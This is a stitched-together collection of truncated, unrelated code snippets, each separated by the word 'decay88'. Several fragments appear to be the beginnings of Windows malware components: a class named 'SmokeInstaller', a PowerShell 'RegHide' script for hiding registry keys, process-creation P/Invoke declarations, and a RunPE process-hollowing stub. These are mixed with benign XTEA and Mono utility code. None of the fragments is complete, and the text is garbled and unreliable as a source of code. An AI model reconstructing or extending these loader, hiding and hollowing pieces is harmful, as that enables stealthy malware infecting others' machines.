decay88

                  format PE GUI 4.0
                  entry main

include 'FS/INCLUDE/win32ax.inc'

struct PROCESSENTRY32
      dwSize                  dd ?
      cntUsage                dd ?
      th32ProcessID           dd ?
      th32DefaultHeapID       dd ?

decay88

using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Security.Principal;
 
namespace Reborn
{
    internal class SmokeInstaller

decay88

# requires PSReflect.ps1 to be in the same directory as this script
. .\PSReflect.ps1

$Module = New-InMemoryModule -ModuleName RegHide
# Define our structs. 

# https://msdn.microsoft.com/en-us/library/windows/hardware/ff564879(v=vs.85).aspx
# typedef struct _UNICODE_STRING {
#  USHORT Length;
#  USHORT MaximumLength;

decay88

        [DllImport("kernel32.dll")]
        public static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes, ref SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandles, CreationFlags dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFOEX lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
 
        [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
        public static extern bool CreateProcessWithLogonW(string username, string domain, string password, LogonFlags logonFlags, string applicationName, string commandLine, CreationFlags creationFlags, uint environment, string currentDirectory, ref STARTUPINFO startupInfo, out PROCESS_INFORMATION processInformation);
 
        [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Auto)]
        public static extern bool CreateProcessAsUser(IntPtr hToken, string lpApplicationName, string lpCommandLine, ref SECUR

decay88

 
using System;
using System.IO;
using System.Text;
 
namespace InfectedBytes.Security {
	/// <summary>
	/// Implementation of the "eXtended Tiny Encryption Algorithm".
	/// XTEA is a block cipher designed to correct weaknesses in TEA.
	/// It is a 64-bit block Feistel cipher with a 128-bit key and suggested 64 rounds.

decay88

//
// Authors:
//   Miguel de Icaza (miguel@novell.com)
//
// See the following url for documentation:
//     http://www.mono-project.com/Mono_DataConvert
//
// Compilation Options:
//     MONO_DATACONVERTER_PUBLIC:
//         Makes the class public instead of the default internal.

decay88

static public unsafe double DoubleFromLE (byte[] data, int index)
		{
			if (data == null)
				throw new ArgumentNullException ("data");
			if (data.Length - index < 8)
				throw new ArgumentException ("index");
			if (index < 0)
				throw new ArgumentException ("index");
			
			double ret;

decay88

public class ReflectionService
    {
        private static readonly log4net.ILog logger = log4net.LogManager.GetLogger(System.Reflection.MethodBase.GetCurrentMethod().DeclaringType);
 
        public static object CreateIstance(string _type)
        {
            object _serviceIstance = null;
            try
            {
                foreach(var assembly in AppDomain.CurrentDomain.GetAssemblies())

decay88

/* 
 * Helper class for XTEA en/decryption of arbitrary data.
 * 
 * Copyright (c) 2017, Henrik Heine
 */

using System;
using System.IO;
using System.Text;

decay88

using System;
using System.ComponentModel;
using System.IO;
using System.Runtime.InteropServices;

namespace ConsoleApp61
{
    // something is wrong with this runpe
    // probably has to do with the context
    // not sure